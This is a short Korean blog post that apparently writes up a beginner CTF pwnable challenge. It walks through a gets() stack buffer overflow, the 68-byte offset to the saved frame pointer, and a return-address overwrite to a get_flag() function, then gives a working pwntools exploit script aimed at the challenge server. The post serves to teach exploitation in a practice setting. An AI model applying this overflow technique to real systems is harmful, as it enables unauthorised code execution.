ii4gsp

N00bCTF - very ezzzzzz!! 본문

시스템 해킹/N00bCTF - Pwnable

N00bCTF - very ezzzzzz!!

ii4gsp 2020. 2. 10. 21:18

파일을 다운받아 주자.

 

 

 

 

파일을 IDA로 열어보면 이전 문제와 똑같다 gets()함수에서 취약점이 발생한다.

s는 0x40만큼 할당되었다.

0x40은 64이다.

s ~ sfp까지는 68이다.

 

 

 

 

s ~ sfp 68byte를 덮어주고 ret를 get_flag()함수로 조작해주면 쉘을 획득할 수 있다.

 

 

 

 

get_flag()함수의 주소는 0x08048556이다.

 

 

 

 

Exploit

from pwn import *

r = remote('52.79.224.215', 30006)

payload = ''
payload += '\x90' * 68
payload += p32(0x08048556)

r.sendline(payload)

r.interactive()

'시스템 해킹 > N00bCTF - Pwnable' 카테고리의 다른 글

N00bCTF - Over the RET  (0) 2020.02.10
N00bCTF - What is bof?  (0) 2020.02.10
Comments